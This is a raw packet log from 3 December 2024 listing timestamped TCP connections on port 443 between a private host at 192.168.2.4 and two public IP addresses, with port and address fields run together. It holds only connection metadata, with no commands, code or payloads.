                                                                                                                      Dec 3, 2024 08:55:44.472548962 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.472845078 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.472856998 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.473191023 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.473509073 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.473567009 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.473618984 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.515338898 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.578270912 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.578563929 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.578583002 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.578944921 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.579236984 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.579298973 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.579381943 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.610002995 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.610030890 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.610131025 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.610146046 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.614814997 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.614964008 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.614969969 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.615170956 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.615206003 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.615287066 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.615564108 CET50043443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.615593910 CET44350043196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.615653038 CET50043443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.616157055 CET50043443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.616169930 CET44350043196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.627329111 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.774599075 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.778000116 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.778058052 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.778060913 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.778141975 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.778208971 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.778232098 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.778245926 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.778251886 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.781739950 CET50044443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.781806946 CET4435004413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.781899929 CET50044443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.782092094 CET50044443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.782111883 CET4435004413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.965198040 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.965223074 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.965284109 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.965303898 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.965342999 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.966289043 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.966330051 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.966387987 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.966691971 CET50045443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.966727972 CET44350045196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.966795921 CET50045443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.967152119 CET50045443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.967164993 CET44350045196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.994040966 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.995002031 CET50031443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.995023012 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.995559931 CET50031443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.995565891 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.150882006 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.152070045 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.152082920 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.152981043 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.153043985 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.153496027 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.153547049 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.153722048 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.153728008 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.198101997 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.301795959 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.302074909 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.302093029 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.302421093 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.302705050 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.302771091 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.302872896 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.313069105 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.313092947 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.313138008 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.313143969 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.313158035 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.313194990 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.313199997 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.313220978 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.313257933 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.314661980 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.314677000 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.315093040 CET50046443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.315135002 CET44350046196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.315212011 CET50046443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.316365957 CET50046443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.316379070 CET44350046196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.321147919 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.321402073 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.321413994 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.322499990 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.322560072 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.323520899 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.323584080 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.323926926 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.323932886 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.341586113 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.341840982 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.341861010 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.342899084 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.342961073 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.343244076 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.343303919 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.343329906 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.343379974 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.343386889 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.350198030 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.350390911 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.350409031 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.350708961 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.350960016 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.351015091 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.351063967 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.369478941 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.387289047 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.391336918 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.401151896 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.402625084 CET50037443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.402641058 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.403692961 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.403763056 CET50037443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.404125929 CET50037443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.404186010 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.404438019 CET50037443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.404443979 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.407604933 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.407630920 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.407694101 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.407708883 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.415993929 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.416049957 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.416064978 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.416114092 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.416449070 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.416497946 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.416548967 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.416887999 CET50047443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.416941881 CET44350047196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.417007923 CET50047443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.418987989 CET50047443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.419003963 CET44350047196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.438750982 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.438824892 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.438880920 CET50031443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.449415922 CET50037443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.450059891 CET50031443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.450079918 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.450105906 CET50031443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.450112104 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.453531027 CET50048443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.453569889 CET4435004813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.453634024 CET50048443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.453803062 CET50048443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.453816891 CET4435004813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.504754066 CET44350038196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.505115032 CET50038443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.505125999 CET44350038196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.506011009 CET44350038196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.506063938 CET50038443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.506407976 CET50038443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.506458998 CET44350038196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.506547928 CET50038443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.506551981 CET44350038196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.548780918 CET50038443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:45.800627947 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.806066036 CET50039443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.806082010 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.806643963 CET50039443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.806649923 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.902117014 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.902650118 CET50040443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.902686119 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:45.903172970 CET50040443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:45.903179884 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.004717112 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.004745960 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.004751921 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.004873037 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.004887104 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.012969017 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.013041973 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.013051033 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.013731003 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.013768911 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.013827085 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.014075041 CET50049443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.014123917 CET44350049196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.014185905 CET50049443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.014888048 CET50049443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.014903069 CET44350049196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.164048910 CET44350042196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.164378881 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.164448977 CET44350042196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.165355921 CET44350042196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.165426970 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.165740967 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.165802956 CET44350042196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.165894985 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.207336903 CET44350042196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.207506895 CET4435004113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.208127022 CET50041443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.208173037 CET4435004113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.208640099 CET50041443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.208648920 CET4435004113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.213893890 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.213946104 CET44350042196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.235862017 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.239023924 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.239106894 CET50039443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.239162922 CET50039443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.239187002 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.239200115 CET50039443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.239207029 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.242371082 CET50050443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.242432117 CET4435005013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.242507935 CET50050443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.242701054 CET50050443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.242717981 CET4435005013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.255800009 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.255832911 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.255912066 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.255927086 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.260629892 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.265045881 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.265105963 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.265115023 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.265530109 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.265557051 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.265599966 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.265610933 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.265625000 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.265959978 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.265973091 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.266027927 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.266081095 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.266366959 CET50051443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.266413927 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.266469002 CET50051443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.267273903 CET50051443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.267285109 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.267360926 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.267393112 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.267441988 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.267638922 CET50052443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.267683029 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.268542051 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.268573046 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.268579960 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.268630028 CET50052443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.268667936 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.268682957 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.268819094 CET50052443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.268835068 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.274990082 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.275012016 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.275064945 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.275074959 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.275118113 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.277234077 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.277252913 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.277304888 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.277314901 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.277347088 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.277595043 CET50053443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.277642012 CET44350053196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.278374910 CET50053443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.278887033 CET50053443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.278902054 CET44350053196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.282576084 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.282655001 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.282659054 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.282712936 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.282875061 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.282888889 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.283153057 CET50054443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.283164978 CET44350054196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.283225060 CET50054443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.283655882 CET50054443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.283668041 CET44350054196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.355355978 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.358517885 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.358598948 CET50040443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.358628035 CET50040443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.358642101 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.358654976 CET50040443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.358660936 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.361834049 CET50055443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.361876965 CET4435005513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.361953020 CET50055443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.362114906 CET50055443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:46.362128019 CET4435005513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.432776928 CET44350043196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.433336973 CET50043443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.433367014 CET44350043196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.434449911 CET44350043196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.434520006 CET50043443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.434887886 CET50043443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.434947014 CET44350043196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.435043097 CET50043443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.435049057 CET44350043196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.481036901 CET50043443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:46.526416063 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.526447058 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:46.526453972 CET44350037196.22.142.143192.168.2.4
